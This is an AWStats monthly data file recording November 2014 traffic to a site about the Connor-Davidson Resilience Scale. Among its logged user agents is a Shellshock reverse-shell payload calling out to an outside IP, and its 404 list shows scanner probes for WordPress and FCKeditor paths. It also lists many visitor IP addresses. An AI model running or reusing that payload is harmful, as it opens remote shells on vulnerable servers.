AWSTATS DATA FILE 6.7 (build 1.892)
# If you remove this file, all statistics for date 201411 will be lost/reset.

# Position (offset in bytes) in this file of beginning of each section for
# direct I/O access. If you made changes somewhere in this file, you should
# also remove completely the MAP section (AWStats will rewrite it at next
# update).
BEGIN_MAP 27
POS_GENERAL 1864                
POS_TIME 2538                
POS_VISITOR 17224               
POS_DAY 91804               
POS_DOMAIN 3479                
POS_LOGIN 3713                
POS_ROBOT 3868                
POS_WORMS 4730                
POS_EMAILSENDER 4861                
POS_EMAILRECEIVER 5004                
POS_SESSION 92711               
POS_SIDER 92928               
POS_FILETYPES 5139                
POS_OS 5308                
POS_BROWSER 5433                
POS_SCREENSIZE 6264                
POS_UNKNOWNREFERER 6338                
POS_UNKNOWNREFERERBROWSER 8139                
POS_ORIGIN 8914                
POS_SEREFERRALS 9066                
POS_PAGEREFS 9301                
POS_SEARCHWORDS 10841               
POS_KEYWORDS 12994               
POS_MISC 2200                
POS_ERRORS 13966               
POS_CLUSTER 3569                
POS_SIDER_404 14105               
END_MAP

# LastLine    = Date of last record processed - Last record line number in last log - Last record offset in last log - Last record signature value
# FirstTime   = Date of first visit for history file
# LastTime    = Date of last visit for history file
# LastUpdate  = Date of last update - Nb of parsed records - Nb of parsed old records - Nb of parsed new records - Nb of parsed corrupted - Nb of parsed dropped
# TotalVisits = Number of visits
# TotalUnique = Number of unique visitors
# MonthHostsKnown   = Number of hosts known
# MonthHostsUnKnown = Number of hosts unknown
BEGIN_GENERAL 8
LastLine 20141201004318 1 0 10933508265703
FirstTime 20141101003706
LastTime 20141130234955
LastUpdate 20141202020324 1 0 0 0 0
TotalVisits 2384                
TotalUnique 1859                
MonthHostsKnown 0                   
MonthHostsUnknown 1897                
END_GENERAL

# Misc ID - Pages - Hits - Bandwidth
BEGIN_MISC 10
QuickTimeSupport 0 0 0
JavaEnabled 0 0 0
JavascriptDisabled 0 0 0
PDFSupport 0 0 0
WindowsMediaPlayerSupport 0 0 0
AddToFavourites 0 319 0
RealPlayerSupport 0 0 0
TotalMisc 0 0 0
DirectorSupport 0 0 0
FlashSupport 0 0 0
END_MISC

# Hour - Pages - Hits - Bandwidth - Not viewed Pages - Not viewed Hits - Not viewed Bandwidth
BEGIN_TIME 24
0 171 266 6283157 92 105 2856230
1 114 191 3690260 102 120 2420414
2 155 269 6100246 125 133 2641499
3 178 280 5673389 76 87 1299615
4 217 350 7145547 80 88 1486916
5 237 369 8519501 66 77 1491208
6 166 288 6433517 110 114 3261714
7 216 386 7501726 93 100 2058137
8 260 448 10763977 98 103 2016756
9 254 456 8745147 96 105 1759132
10 464 725 16492039 89 98 1588212
11 328 563 12836441 99 111 3562690
12 315 536 11814263 113 142 2959575
13 325 518 13318675 98 111 2700153
14 317 557 11268692 102 119 1462264
15 244 459 8458174 90 97 2595196
16 319 533 11568039 92 110 3318408
17 285 464 11236342 94 107 2962407
18 228 379 8762550 113 119 2007427
19 219 374 8264705 99 107 2483995
20 210 340 9757977 54 64 1622198
21 259 450 10276003 92 99 2350461
22 201 313 6773052 99 117 2165744
23 176 272 6989276 86 101 1941143
END_TIME

# Domain - Pages - Hits - Bandwidth
# The 10 first Pages must be first (order not required for others)
BEGIN_DOMAIN 1
ip 5858 9786 218672695
END_DOMAIN

# Cluster ID - Pages - Hits - Bandwidth
BEGIN_CLUSTER 0
END_CLUSTER

# Login - Pages - Hits - Bandwidth - Last visit
# The 10 first Pages must be first (order not required for others)
BEGIN_LOGIN 0
END_LOGIN

# Robot ID - Hits - Bandwidth - Last visit - Hits on robots.txt
# The 10 first Hits must be first (order not required for others)
BEGIN_ROBOT 21
googlebot 706 16212964 20141130233738 0
\wbot[\/\-] 273 11571757 20141130225058 0
baiduspider 224 5372761 20141130233508 0
spider 99 1547559 20141130222752 0
robot 43 724480 20141130105026 0
slurp 25 1373537 20141129174205 0
crawl 20 424716 20141130232553 0
bspider 18 935840 20141116011213 0
mj12bot 14 432764 20141129142241 0
tencenttraveler 11 132528 20141119065754 0
seznambot 8 233856 20141128122824 0
python 3 24306 20141121072412 0
surveybot 4 32408 20141124085123 0
raven 1 0 20141115115732 0
java 4 24306 20141118105302 0
wordpress 6 23278 20141115161243 0
webfilter 3 88358 20141121060807 0
larbin 2 16204 20141109001017 0
yandex 2 76310 20141106045955 0
netcraft 1 8102 20141107044852 0
nutch 2 16204 20141130045827 0
END_ROBOT

# Worm ID - Hits - Bandwidth - Last visit
# The 5 first Hits must be first (order not required for others)
BEGIN_WORMS 0
END_WORMS

# EMail - Hits - Bandwidth - Last visit
# The 20 first Hits must be first (order not required for others)
BEGIN_EMAILSENDER 0
END_EMAILSENDER

# EMail - Hits - Bandwidth - Last visit
# The 20 first hits must be first (order not required for others)
BEGIN_EMAILRECEIVER 0
END_EMAILRECEIVER

# Files type - Hits - Bandwidth - Bandwidth without compression - Bandwidth after compression
BEGIN_FILETYPES 6
css 3928 6625786 0 0
php 70 11900 0 0
html 2380 19169332 0 0
shtml 3127 154307105 0 0
pdf 277 38558232 0 0
xml 4 340 0 0
END_FILETYPES

# OS ID - Hits
BEGIN_OS 8
macosx 2315
winxp 773
winlong 153
win2003 29
unix 22
winnt 6012
Unknown 231
linux 251
END_OS

# Browser ID - Hits
BEGIN_BROWSER 56
msie6.0 191
firefox14.0 7
firefox28.0 8
firefox5.0 5
firefox20.0 8
firefox3.6 1
firefox4.0.1 26
firefox26.0 3
firefox5.02 10
firefox8.0 19
firefox3.6.92 2
firefox18.0 4
curl 2
lynx 4
firefox34.0 21
firefox24.0 32
firefox3.6.15 33
firefox2.0.0.13 11
firefox31.0 74
msie8.0 418
firefox13.0.1 6
firefox6.0.2 11
msie7.0 89
firefox16.0 34
firefox23.0 9
firefox9.0.1 5
wget 2
msie9.0 385
Unknown 92
firefox27.0 35
firefox11.0 1
firefox32.0 167
firefox17.0 9
opera 12
firefox21.0 19
firefox29.0 20
firefox3.5.2 2
firefox30.0 16
msie5.5 2
firefox12.0 5
firefox18.0.1 1
firefox2.0.0.11 1
firefox33.0 895
mozilla 884
firefox1.0 1
firefox25.0 10
netscape5.0 17
firefox14.0.1 17
firefox22.0 5
msie10.0 261
firefox6.0 25
netscape4.0 3
firefox3.6.3 16
firefox19.0 2
safari 5846
firefox3.6.13 2
END_BROWSER

# Screen size - Hits
BEGIN_SCREENSIZE 0
END_SCREENSIZE

# Unknown referer OS - Last visit date
BEGIN_UNKNOWNREFERER 23
Mozilla/5.0_(BlackBerry;_U;_BlackBerry_9220;_en-GB)_AppleWebKit/534.11__(KHTML,_like_Gecko)_Version/7.1.0.337_Mobile_Safari/534.11_ 20141110110642
Ruby 20141111235320
AppEngine-Google;_(_http://code.google.com/appengine;_appid:_s~getfavicon27) 20141121083402
Mozilla/5.0_(compatible;_Google_AppsViewer;_http://drive.google.com) 20141113060357
()_{_:;_};_/bin/bash_-i_>&_/dev/tcp/89.163.239.48/10033_0>&1 20141124071333
Mozilla/5.0_(PlayBook;_U;_RIM_Tablet_OS_2.1.0;_en-US)_AppleWebKit/536.2__(KHTML,_like_Gecko)_Version/7.2.1.0_Safari/536.2_ 20141104053342
- 20141130083011
Curl/PHP_5.4.34_(http://github.com/shuber/curl) 20141126120857
Mozilla/5.0_(BlackBerry;_U;_BlackBerry_9900;_en-US)_AppleWebKit/534.11__(KHTML,_like_Gecko)_Version/7.1.0.862_Mobile_Safari/534.11_ 20141112170604
Mozilla/5.0_(compatible;_WebMasterAid/1.0;__http://wmaid.com/en/explore/) 20141103195325
Opera/9.80_(Android;_Opera_Mini/5.1.24639/35.5247;_U;_ar)_Presto/2.8.119_Version/11.10 20141102050433
Blackboard_Safeassign 20141118105302
Opera/9.80_(Android;_Opera_Mini/7.5.35199/35.5247;_U;_en)_Presto/2.8.119_Version/11.10 20141102104010
Lynx/2.8.5rel.1_libwww-FM/2.15FC_SSL-MM/1.4.1c_OpenSSL/0.9.7e-dev 20141116204212
Microsoft_Office_Protocol_Discovery 20141121070425
ContextAd_Bot_1.0 20141106103211
Mozilla/4.0 20141124061904
ChkMe.com_PRO_Tools_-_For_more_information_or_complaint_contact_us_at_info(at)chkme(dot)net 20141130153251
facebookexternalhit/1.1_(_http://www.facebook.com/externalhit_uatext.php) 20141129130747
Mozilla/4.0_(compatible;) 20141130014425
Microsoft_Office_Excel_2013 20141101171938
BlackBerry9000/4.6.0.167_Profile/MIDP-2.0_Configuration/CLDC-1.1_VendorID/102_ips-agent 20141109003331
NerdyBot 20141130110858
END_UNKNOWNREFERER

# Unknown referer Browser - Last visit date
BEGIN_UNKNOWNREFERERBROWSER 12
Ruby 20141111235320
AppEngine-Google;_(_http://code.google.com/appengine;_appid:_s~getfavicon27) 20141121083402
ContextAd_Bot_1.0 20141106103211
Microsoft_Office_Protocol_Discovery 20141121070425
()_{_:;_};_/bin/bash_-i_>&_/dev/tcp/89.163.239.48/10033_0>&1 20141124071333
- 20141130083011
ChkMe.com_PRO_Tools_-_For_more_information_or_complaint_contact_us_at_info(at)chkme(dot)net 20141130153251
facebookexternalhit/1.1_(_http://www.facebook.com/externalhit_uatext.php) 20141129130747
Microsoft_Office_Excel_2013 20141101171938
BlackBerry9000/4.6.0.167_Profile/MIDP-2.0_Configuration/CLDC-1.1_VendorID/102_ips-agent 20141109003331
Blackboard_Safeassign 20141118105302
NerdyBot 20141130110858
END_UNKNOWNREFERERBROWSER

# Origin - Pages - Hits 
BEGIN_ORIGIN 6
From0 1114 1149
From1 3 3
From2 2065 2079
From3 399 410
From4 2277 6145
From5 0 0
END_ORIGIN

# Search engine referers ID - Pages - Hits
BEGIN_SEREFERRALS 8
google 1950 1964
baidu 38 38
search 11 11
aol 1 1
yandex 2 2
sogou 3 3
ask 5 5
yahoo 55 55
END_SEREFERRALS

# External page referers - Pages - Hits
# The 10 first Pages must be first (order not required for others)
BEGIN_PAGEREFS 24
http://semalt.semalt.com/crawler.php 114 114
http://www.bing.com/search 113 113
http://www.statisticssolutions.com/connor-davidson-resilience-scale-cd-risc/ 82 82
http://buttons-for-website.com 43 43
http://translate.googleusercontent.com/translate_c 9 20
http://www.statisticssolutions.com 7 7
http://disasterlit.nlm.nih.gov/record/8177 4 4
http://sites.dartmouth.edu/geisel-resilience-curriculum-resources/assessment-tools/ 3 3
https://www.statisticssolutions.com 3 3
https://www.facebook.com 3 3
http://searchabout.wc.lt/look/CD_RISC/CONNORDAVIDSON_RESILIENCESCALE/aHR0cDovL2NkLXJpc2MuY29tL2NkLXJpc2MvZmFxLnNodG1s_blog 1 1
http://mail53a.webmail.libero.it/cp/MailMessageBody.jsp 1 1
http://translate.google.sk/translate_p 2 2
http://adu1t.in 2 2
http://translate.google.es/translate_p 2 2
http://searchabout.wc.lt/look/CD_RISC/CONNORDAVIDSON_RESILIENCESCALE/aHR0cDovL2NkLXJpc2MuY29tLw==_blog 1 1
http://l.facebook.com/lsr.php 1 1
http://wmaid.com/en/explore/cd-risc.com/ 1 1
http://webcache.googleusercontent.com/search 1 1
http://mail2.daum.net/hanmailex/Top.daum 1 1
http://www.e-bookspdf.org/view/aHR0cDovL2Nvbm5vcmRhdmlkc29uLXJlc2lsaWVuY2VzY2FsZS5jb20vY2QtcmlzYy9yZXF1ZXN0LWZvcm0ucGRm/Q29ubm9yLWRhdmlkc29uIFJlc2lsaWVuY2UgU2NhbGUgKGNkLXJpc2MpIFByb2plY3Q= 1 1
http://go.mail.ru/search 1 1
http://wmaid.com/en/explore/connordavidson-resiliencescale.com/ 1 1
http://us.wow.com/search 2 2
END_PAGEREFS

# Search keyphrases - Number of search
# The 10 first number of search must be first (order not required for others)
BEGIN_SEARCHWORDS 60
connor+davidson+resilience+scale 17
cd-risc 13
connor-davidson+resilience+scale 5
connor+davidson 4
connor+davidson+resilience+scale+original 3
connor+davidson+resilience+scale+free+download 3
connor+davidson+resilience+scale+pdf 3
www.connordavidson-resiliencescale.com 2
connor-davidson+resilience+scale+cd-risc 2
gim126901037 2
connor-davidson+resilience+scale+cd-risc+pdf 1
what+is+the+25-item+cd+risc%3f 1
%d8%b3%d8%af+%d8%b3%d9%83%d9%84 1
connor+scale 1
connor-davidson+resilience+scale+10 1
connor+davidson+resiliency+scale 1
cd+risc+scale 1
connor+davidson+resilience+scale+measure 1
resilience+scales 1
tab_hty.top 1
hindi+resilience+scale 1
25+items+connor+davidson+resilience+scale 1
connor-davison+resilience+scale 1
connor+davidson%e2%80%99s+resilience+scale 1
resilience+scale+mark+scale 1
%ef%bc%a3%ef%bc%a4%ef%bc%8d%ef%bc%b2%ef%bc%a9%ef%bc%b3%ef%bc%a3%e3%80%80%e3%82%b3%e3%83%8a%e3%83%bc%e3%83%87%e3%83%93%e3%83%83%e3%83%89%e3%82%bd%e3%83%b3 1
cd+risk+resilience 1
cd+risc 2
connor-davidson+resilience+scale+cd-risc+price 1
introduction+of+connor+davidson+resilience 1
cd-risc10 1
25-item+connor-davidson+resilience+scale+cd-risc 1
risc+norms 1
resilience+questionnaire+o+connor+davidson 1
conor+davidson+residence+scale 1
resilience+scale 2
connor+scale+pdf 1
scoring+resilience+scale 2
cd+risk+resilience+scale+chinese 2
www.cd-risc.com 1
purchase+the+connor-davidson+resilience+scale+cd-risc 1
cd-risc.com 1
research+using+cd-risc 1
resilency+scale 1
cd-risc%e3%80%80%e3%82%b3%e3%83%8a%e3%83%bc%e3%83%87%e3%83%93%e3%83%83%e3%83%89%e3%82%bd%e3%83%b3 1
connor+davison+resilience 1
connor-davidson+resilience+scale+pdf 1
resilience+scale+ftee+download 1
limitations+of+cd-risc 1
cd-risc+chinese 1
c+d+risk+full+scale 1
connor-davidson+resilience-scale+cd-risc 2
the+connor-davidson+resilience+scale 1
nexearch 2
connor+davidson+resilience 1
cd-risc+pdf 2
10+item+connor+davidson+resilience+scale 2
scale+cd 1
connor+davidson+resilience+scale+scoring 1
connor-david+resiliency+scale 1
END_SEARCHWORDS

# Search keywords - Number of search
# The 10 first number of search must be first (order not required for others)
BEGIN_KEYWORDS 62
scale 66
resilience 62
connor 43
davidson 40
cd-risc 26
connor-davidson 16
cd 8
pdf 8
risc 4
risk 4
the 3
norms 1
connor-david 1
item 2
d 1
www.connordavidson-resiliencescale.com 2
conor 1
mark 1
%d8%b3%d8%af 1
chinese 3
%d8%b3%d9%83%d9%84 1
gim126901037 2
25 1
tab_hty.top 1
25-item 2
what 1
%ef%bc%a3%ef%bc%a4%ef%bc%8d%ef%bc%b2%ef%bc%a9%ef%bc%b3%ef%bc%a3%e3%80%80%e3%82%b3%e3%83%8a%e3%83%bc%e3%83%87%e3%83%93%e3%83%83%e3%83%89%e3%82%bd%e3%83%b3 1
resilience-scale 2
full 1
questionnaire 1
c 1
cd-risc10 1
davidson%e2%80%99s 1
introduction 1
price 1
10 3
scoring 3
download 4
limitations 1
of 2
research 1
risc%3f 1
is 1
www.cd-risc.com 1
cd-risc.com 1
free 3
cd-risc%e3%80%80%e3%82%b3%e3%83%8a%e3%83%bc%e3%83%87%e3%83%93%e3%83%83%e3%83%89%e3%82%bd%e3%83%b3 1
connor-davison 1
original 3
purchase 1
nexearch 2
ftee 1
using 1
residence 1
hindi 1
measure 1
resiliency 2
davison 1
scales 1
resilency 1
o 1
items 1
END_KEYWORDS

# Errors - Hits - Bandwidth
BEGIN_ERRORS 5
403 14 6578
206 246 15274487
405 1 229
404 803 457700
301 1 262
END_ERRORS

# URL with 404 errors - Hits - Last URL referer
BEGIN_SIDER_404 54
/bahasa%20malaysian 1 -
/sitemap.xml 2 -
/editor/FCKeditor/editor/dialog/fck_about.html 1 http://connordavidson-resiliencescale.com/editor/FCKeditor/editor/dialog/fck_about.html
/robots.txt 491 -
/admin/FCKeditor/editor/filemanager/connectors/test.html 2 -
/apple-touch-icon.png 23 -
/cd-risc/faq.shtml/trackback/ 1 http://www.connordavidson-resiliencescale.com/cd-risc/faq.shtml
/admin.php 4 -
/wp-login/ 1 -
/cd-risc/requestform.shtml+[PLM=0]+GET+http://www.connordavidson-resiliencescale.com/cd-risc/requestform.shtml+[0,9552,12933]+-%3E+[N]+POST+http://www.connordavidson-resiliencescale.com/cd-risc/requestform.php+[0,0,26] 23 http://www.connordavidson-resiliencescale.com/cd-risc/requestform.shtml+[PLM=0]+GET+http://www.connordavidson-resiliencescale.com/cd-risc/requestform.shtml+[0,9552,12933]+-%3E+[N]+POST+http://www.connordavidson-resiliencescale.com/cd-risc/requestform.php+[0,0,26]
/wordpress/wp-login.php 1 -
/admin/FCKeditor/editor/dialog/fck_about.html 1 http://connordavidson-resiliencescale.com/admin/FCKeditor/editor/dialog/fck_about.html
/wp-admin/admin-ajax.php 1 -
/editor/editor/dialog/fck_about.html 1 http://connordavidson-resiliencescale.com/editor/editor/dialog/fck_about.html
/wp-admin/ 1 -
/cd-risc/bibliography.shtml. 1 -
/cd-risc/privacypolicy.shtml/trackback/ 135 http://www.connordavidson-resiliencescale.com/cd-risc/privacypolicy.shtml
/Fckeditor/editor/filemanager/browser/default/connectors/test.html 2 -
/xmlrpc.php 4 -
/browserconfig.xml 14 -
/editor/editor/filemanager/connectors/test.html 2 -
/manage/FCKeditor/editor/dialog/fck_about.html 1 http://connordavidson-resiliencescale.com/manage/FCKeditor/editor/dialog/fck_about.html
/wp/wp-login.php 1 -
/nyet.gif 1 -
/section/wp-login.php 1 -
/apple-touch-icon-precomposed.png 22 -
/FCKeditor/editor/filemanager/connectors/test.html 2 -
/js/fckeditor/editor/ 1 -
//index.php 1 -
/wp-signup.php 3 -
/administrator/index.php 2 -
/fckeditor/editor/ 1 -
/transformers.txt 2 -
/apple-touch-icon-120x120.png 1 -
/manage/fckeditor/editor/ 1 -
/cgi-sys/entropysearch.cgi 2 -
/cd-risc/termsofservice.shtml/trackback/ 15 http://www.connordavidson-resiliencescale.com/cd-risc/termsofservice.shtml
/include/fckeditor/editor/ 1 -
/administrator/ 3 -
/blog/wp-admin/ 1 -
/editor/editor/filemanager/browser/default/connectors/test.html 2 -
/apple-touch-icon-120x120-precomposed.png 1 -
/blog/wp-login.php 1 -
/FCK/editor/dialog/fck_about.html 1 http://connordavidson-resiliencescale.com/FCK/editor/dialog/fck_about.html
/cd-risc/faq.shtml. 2 -
/index.php 5 -
/wp-login.php 8 -
/test/wp-admin/ 1 -
/domainsigma_removal_ce75d12f4ca2fb852a98eb28f980ed6be9fb6bbc.html 1 -
/site/wp-login.php 1 -
/misc/drupal.js 2 -
/admin/fckeditor/editor/ 1 -
/wp/wp-admin/ 1 -
/admin/Fckeditor/editor/filemanager/browser/default/connectors/test.html 2 -
END_SIDER_404

# Host - Pages - Hits - Bandwidth - Last visit date - [Start date of last visit] - [Last page of last visit]
# [Start date of last visit] and [Last page of last visit] are saved only if session is not finished
# The 10 first Hits must be first (order not required for others)
BEGIN_VISITOR 1897
134.7.248.130 96 104 4496467 20141130014425
76.204.114.115 56 56 453712 20141118104748
103.255.170.8 36 50 1173771 20141126225548
119.94.228.127 29 37 1316043 20141121090901
75.110.76.130 29 45 1193164 20141118223147
123.202.130.86 27 33 247278 20141118080633
199.71.174.200 26 44 1526368 20141124154905
66.117.9.196 23 23 186346 20141123132535
130.14.254.24 23 23 0 20141129035326
153.191.13.75 22 26 1311012 20141107224327
65.26.93.163 4 8 39482 20141129155426
66.249.84.176 2 2 16204 20141105014325
106.66.159.45 1 1 12760 20141107023249
194.176.105.144 4 6 349605 20141119084850
37.152.11.28 8 14 334057 20141125113020
173.22.82.219 8 22 329341 20141124214452
5.151.0.33 3 5 27843 20141129220009
69.58.178.56 8 8 324046 20141118015648
86.181.137.222 5 7 462488 20141121080145
181.66.157.73 1 3 11639 20141122074339
220.255.1.116 0 1 1276 
89.242.245.163 3 5 168273 20141111171036
132.199.142.164 2 4 19741 20141128042903
101.199.108.57 1 3 11639 20141110000336
137.44.96.208 1 3 11639 20141125045724
118.238.220.238 2 2 16204 20141111235320
217.69.133.169 4 4 32408 20141123131217
66.108.50.77 4 8 217370 20141106141933
58.160.98.9 1 3 11639 20141111224955
151.18.229.120 5 7 183690 20141116204307
190.78.127.171 1 3 11639 20141120214648
175.44.5.41 3 3 36144 20141104045816
187.41.219.205 1 3 11639 20141128212044
148.251.126.37 1 3 11639 20141122045745
170.140.246.160 6 8 349462 20141106141925
180.244.6.106 2 4 19741 20141105081914
35.8.96.29 7 11 64385 20141104165756
24.100.82.177 3 7 211827 20141128150002
70.95.191.198 1 3 11639 20141124204810
125.60.156.174 1 3 11639 20141102071608
130.211.134.238 2 2 16204 20141130101333
117.26.199.68 1 1 8102 20141125081005
181.134.22.111 1 3 11639 20141114082744
217.55.23.3 1 3 11639 20141105103649
134.184.100.152 1 3 11639 20141113054909
79.43.19.12 2 4 19741 20141108124935
180.87.253.134 6 6 56504 20141116221700
146.90.124.160 3 5 163615 20141111152105
117.120.16.131 1 3 11639 20141116221258
141.214.17.201 2 4 22300 20141110161414
146.96.252.2 1 3 11639 20141122095507
27.253.80.116 1 3 11639 20141112223931
134.190.148.232 1 3 11639 20141113133442
128.95.240.158 5 7 40773 20141114182646
173.54.184.172 2 4 24399 20141113145244
62.254.173.13 5 9 232689 20141119055107
99.237.227.105 6 12 69368 20141120092141
86.14.214.243 1 3 14198 20141127105544
129.115.2.145 2 4 24399 20141118153257
131.253.24.92 1 3 71745 20141119053803
155.41.104.231 3 5 341503 20141110123504
103.225.28.195 1 3 11639 20141108063310
86.210.160.159 1 3 14198 20141103095337
186.107.65.70 1 3 11639 20141115212510
173.8.107.81 2 4 22300 20141114111621
223.255.230.46 1 1 185990 20141110105225
130.101.20.201 9 15 151312 20141118173800
130.16.98.181 6 8 286869 20141114095552
156.145.83.35 7 9 441321 20141114132946
36.248.167.170 2 2 24096 20141104235954
161.110.1.160 1 3 11639 20141119075721
131.251.254.82 1 3 11639 20141127060547
198.232.250.45 2 4 24399 20141112131247
76.220.26.166 2 4 22300 20141113001629
14.139.194.12 2 4 19741 20141125130928
114.79.3.44 1 3 14198 20141103191943
201.208.12.254 4 9 35051 20141112144401
81.242.119.84 2 4 16395 20141103034117
98.254.220.72 1 3 71745 20141105062504
194.81.33.15 2 4 24399 20141126034735
184.59.116.218 1 3 16297 20141129194132
49.50.236.216 1 3 16297 20141114100126
195.211.155.217 1 1 21521 20141105002707
94.118.68.189 1 1 8102 20141127082139
185.52.60.51 1 1 12760 20141128032702
121.97.136.203 1 3 11639 20141117094319
158.132.232.163 1 3 11639 20141121040736
168.122.4.122 1 3 11639 20141119125125
130.211.148.102 1 1 8102 20141105110838
193.144.206.53 15 19 655432 20141120033435
175.136.238.134 2 6 27936 20141124024006
66.249.81.236 3 3 28177 20141104151518
98.243.173.204 5 9 227902 20141103185651
85.97.141.205 1 3 11639 20141115055406
38.100.21.62 9 11 335685 20141116215606
173.250.139.28 2 4 197629 20141120142426
50.142.208.195 1 1 8102 20141129225816
76.167.50.23 3 5 87949 20141113175204
72.200.250.143 1 3 11639 20141106135408
66.79.11.92 5 7 176545 20141124032516
213.0.53.131 4 8 214024 20141126061455
134.174.110.7 1 3 11639 20141112115009
108.94.104.245 4 6 352164 20141117052410
66.61.97.108 8 14 93504 20141116143803
201.67.3.32 1 3 11639 20141115134050
72.84.107.11 9 11 268777 20141109230826
152.20.238.105 1 3 11639 20141113102126
194.82.50.2 7 10 415240 20141105102115
66.249.82.84 1 1 8102 20141109022407
177.40.209.46 1 3 11639 20141127140135
166.123.216.29 1 3 11639 20141120133939
129.78.56.214 2 4 19741 20141105215747
109.246.122.235 3 5 30402 20141110061522
24.15.207.235 1 1 8102 20141121192822
189.210.208.112 8 8 64816 20141129201922
138.51.76.231 1 3 11639 20141110145644
97.122.98.84 5 9 44310 20141123212940
79.53.98.123 1 3 11639 20141114032341
62.24.181.134 5 5 100616 20141117123122
203.215.118.169 3 5 28964 20141119065624
130.211.134.79 1 1 8102 20141125110820
31.102.214.104 2 4 22300 20141108161621
157.56.250.12 2 2 16204 20141126140937
173.70.217.31 10 12 645497 20141130162538
103.16.70.11 1 3 16297 20141106085634
158.255.0.148 1 1 68208 20141109151038
103.246.201.35 1 3 11639 20141110110628
210.90.20.101 3 5 202385 20141123235602
66.249.84.191 7 7 89320 20141130144046
54.160.18.169 1 3 11639 20141109073001
178.32.234.138 2 2 34281 20141129191048
112.111.165.98 1 1 8102 20141113210011
150.244.69.82 4 6 35945 20141120130255
110.137.244.45 1 3 71745 20141105011906
64.222.155.202 10 12 441033 20141115104624
89.179.111.199 1 1 8102 20141117121102
131.253.24.94 1 3 71745 20141129211813
72.241.4.215 2 5 81123 20141116153540
144.118.27.27 10 14 394723 20141107193955
151.133.1.76 3 5 210389 20141128062952
83.40.232.251 1 3 11639 20141110112537
76.122.113.145 2 6 142214 20141113153018
99.116.79.112 2 4 168932 20141127172004
129.81.67.92 1 3 11639 20141117160343
75.85.24.68 5 9 332547 20141126095438
177.85.21.52 1 3 11639 20141108200919
202.46.63.207 1 1 8102 20141102085730
189.110.188.68 1 3 11639 20141119090651
89.106.45.154 2 5 23576 20141126021336
202.46.55.202 1 1 8102 20141102173209
2.216.26.178 1 1 8102 20141130043117
203.99.211.18 1 3 71745 20141103040648
109.79.162.28 1 1 12760 20141117061221
93.62.187.133 7 11 480982 20141114101518
27.150.242.28 1 1 21521 20141118050302
61.220.27.79 6 16 422216 20141106002229
108.199.145.184 2 4 19741 20141116195310
201.9.78.60 1 3 11639 20141115161808
64.171.106.194 4 6 176375 20141117112620
92.24.35.55 1 3 11639 20141129112904
216.221.76.93 1 3 11639 20141118115022
59.100.88.1 4 6 213833 20141102000211
158.111.236.112 1 3 11639 20141121190011
189.78.89.159 1 3 11639 20141119130924
109.175.235.160 3 5 205731 20141106075829
168.235.1.4 1 3 11639 20141122212108
103.26.196.190 7 8 419736 20141115055431
82.161.207.94 20 30 930010 20141115172348
108.168.11.42 1 3 11639 20141111090125
192.99.40.137 0 2 3537 
173.65.170.112 2 4 19741 20141118124449
194.83.57.1 1 3 11639 20141118090352
206.125.82.58 2 4 197629 20141117133008
95.122.187.145 2 6 23278 20141123195251
200.24.16.29 1 3 11639 20141118170819
223.176.31.8 1 1 8102 20141114202943
109.153.158.181 2 4 155513 20141115120040
128.135.50.116 2 4 19741 20141117113634
5.239.16.154 6 6 62031 20141109023556
204.76.134.30 3 5 30402 20141121122912
61.244.103.37 1 3 11639 20141104000524
62.197.209.122 2 4 19741 20141104151340
75.102.213.100 2 4 19741 20141103212101
159.123.253.1 5 11 230130 20141106144501
134.226.168.87 1 3 11639 20141103124623
93.189.191.93 13 17 669237 20141120161848
41.237.111.73 0 1 2261 
188.143.52.100 1 1 4756 20141117055237
130.211.166.122 1 1 8102 20141117110810
203.1.252.5 2 6 23278 20141127020507
24.91.93.41 2 4 22300 20141108123652
220.181.51.139 1 1 8102 20141104212735
86.161.4.102 2 4 197629 20141129162942
121.54.54.174 9 13 506547 20141120225820
220.181.51.136 0 1 2261 
128.36.232.35 3 3 24306 20141105145102
207.248.207.90 5 9 44238 20141129130651
54.80.90.104 1 3 11639 20141116002057
200.101.253.36 1 3 11639 20141104071637
205.173.105.210 2 4 155513 20141104162233
50.57.190.50 1 1 185990 20141103022105
193.60.53.38 5 15 234788 20141112082614
191.240.131.149 1 3 11639 20141112155200
2.147.46.215 2 4 24399 20141104091126
184.19.85.131 4 6 35945 20141129194423
82.22.112.229 3 5 27056 20141107050401
202.71.178.2 6 10 220088 20141124223630
79.118.0.116 1 3 11639 20141129050951
79.33.230.31 1 3 11639 20141105085921
86.130.242.238 2 4 24399 20141122070420
81.159.127.240 1 3 11639 20141118064628
66.194.51.226 1 3 11639 20141110145129
141.140.145.107 2 4 24399 20141118145821
155.41.93.191 4 4 37526 20141124114954
134.220.222.86 9 13 352041 20141103043532
96.45.202.34 2 4 155513 20141121134611
203.215.118.126 4 6 213833 20141106200940
198.187.233.250 2 4 26958 20141106175933
39.41.180.52 1 3 11639 20141108082753
158.111.236.80 9 15 613060 20141120095436
93.82.84.155 9 13 693686 20141122134825
193.198.59.100 9 11 571874 20141127031752
139.137.128.44 1 3 11639 20141125133101
151.77.186.101 1 3 11639 20141125020802
71.222.84.201 3 5 30402 20141128000949
189.81.216.239 1 3 11639 20141101085812
68.189.241.169 1 1 143874 20141109072500
170.98.106.254 1 3 11639 20141119055411
147.156.178.9 4 6 171717 20141107064137
110.80.63.19 1 1 21521 20141129180633
168.122.119.27 1 3 11639 20141124180520
92.151.21.251 1 3 11639 20141113230958
85.122.30.11 4 6 35945 20141124162349
76.173.110.3 1 3 11639 20141101024119
66.249.84.164 1 1 8102 20141127123226
143.52.66.200 1 3 11639 20141106050346
144.76.155.8 1 1 143874 20141127133546
186.137.24.222 1 3 11639 20141124223810
157.178.1.101 5 7 224494 20141120121729
129.94.28.37 1 3 25058 20141111231246
218.253.31.108 1 3 11639 20141117184335
201.68.135.39 1 3 11639 20141107170651
152.16.51.187 20 28 1262563 20141119105851
86.120.98.30 4 6 35945 20141101125419
217.200.202.189 1 3 11639 20141125063036
202.170.60.248 2 4 29814 20141128003424
222.166.194.164 2 4 22300 20141126213451
98.112.2.217 7 11 319859 20141110134911
131.181.251.22 2 4 19741 20141104230342
153.218.143.229 10 14 753268 20141127085601
98.234.210.2 2 4 19741 20141129003907
175.44.4.43 14 14 168672 20141124162549
175.159.173.230 1 3 11639 20141107020528
150.214.9.250 1 3 11639 20141128045130
60.240.52.93 1 3 11639 20141108163452
161.116.208.183 1 3 11639 20141111084756
131.188.245.188 1 1 8102 20141126085026
125.7.52.130 10 14 518779 20141120224636
74.60.190.121 1 3 11639 20141118181558
41.212.42.17 1 3 25058 20141102125454
75.56.236.81 2 4 197629 20141113101413
46.224.78.213 2 4 29057 20141112140827
223.19.212.85 1 3 11639 20141110095811
61.135.190.103 1 1 8102 20141126011202
